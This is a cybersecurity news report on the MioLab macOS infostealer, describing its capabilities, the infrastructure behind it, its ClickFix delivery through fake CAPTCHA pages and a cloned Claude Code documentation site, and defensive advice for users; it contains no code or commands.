Emerging Threat: MioLab Infostealer Targets macOS Users with Advanced Tactics
A new and sophisticated macOS infostealer, known as MioLab or Nova, has surfaced, marking a significant evolution in malware targeting Apple users. Advertised on Russian-speaking underground forums, MioLab exemplifies the growing interest of cybercriminals in macOS platforms, which have traditionally been considered less susceptible to such threats.
MioLab’s Capabilities and Architecture
MioLab operates as a Malware-as-a-Service (MaaS) platform, offering a user-friendly web interface and a compact C-based payload approximately 100 KB in size. This lightweight design aids in evading signature-based antivirus detection. The malware is compatible with both Intel x86-64 and Apple Silicon ARM64 architectures, ensuring functionality across macOS versions from Sierra to Tahoe.
The infostealer boasts a range of capabilities, including:
– Credential Theft: Extracting login information from various browsers.
– Cryptocurrency Wallet Draining: Accessing and transferring funds from digital wallets.
– Password Manager Harvesting: Collecting stored passwords from password management applications.
– File Collection: Gathering specific files from the infected system.
A premium module extends its functionality to hardware wallets like Ledger and Trezor, enabling the theft of 24-word BIP39 recovery seed phrases, which are crucial for accessing cryptocurrency funds.
Rapid Development and Enhanced Features
Analysts from LevelBlue have observed an unusually swift development cycle for MioLab. Recent updates up to February 2026 have introduced significant enhancements, such as:
– Rebuilt Hardware Wallet Extraction Module: Improving the efficiency of extracting data from hardware wallets.
– On-Device Apple Notes Decryption: Allowing access to sensitive information stored in Apple Notes.
– Functional Safari Cookie Grabber: Enabling the collection of session cookies from Safari, potentially leading to unauthorized account access.
– Comprehensive Team API: Facilitating the programmatic generation of payloads and retrieval of stolen data without direct interaction with the web panel.
Additionally, MioLab integrates Telegram bot notifications, providing real-time alerts to cybercriminal affiliates, known as traffers, about new infections.
Infrastructure and Broader Cybercrime Ecosystem
Investigations into MioLab’s infrastructure reveal its operators are part of a larger cybercriminal network. The malware’s administrative panel was previously hosted on playavalon[.]org, which has since been repurposed for an Ethereum token airdrop phishing campaign. This indicates a strategy to convert residual traffic from previous operations into new fraudulent activities.
Both the MioLab operation and the phishing campaign are linked to FEMO IT Solutions Ltd., a bulletproof hosting provider under the Defhost brand, known for shielding various malware families from law enforcement scrutiny.
ClickFix Delivery: Exploiting User Trust
A notable feature of MioLab is its ClickFix infection chain, a social engineering technique that deceives users into executing malicious commands in the macOS Terminal. The malware’s web panel includes a utility that generates a Terminal payload, which can be deployed through fake CAPTCHA pages or cloned developer portals.
Recently, researcher Marcelo Rivero identified a malvertising campaign distributing MioLab via a convincing clone of the Claude Code documentation site—a legitimate command-line AI tool by Anthropic. This campaign specifically targeted developers comfortable with executing Terminal commands, increasing the likelihood of successful infections.
Implications and Recommendations
The emergence of MioLab underscores a significant shift in the threat landscape for macOS users. As Apple’s market share grows among professionals and cryptocurrency enthusiasts, macOS has become an attractive target for cybercriminals.
To mitigate the risk of infection:
– Exercise Caution with Terminal Commands: Avoid executing commands from unverified sources.
– Verify Software Sources: Download applications only from official websites or trusted platforms.
– Stay Informed: Keep abreast of emerging threats targeting macOS systems.
– Implement Robust Security Measures: Utilize comprehensive security solutions capable of detecting and preventing advanced malware threats.
By adopting these practices, users can enhance their defenses against sophisticated malware like MioLab and safeguard their sensitive information.
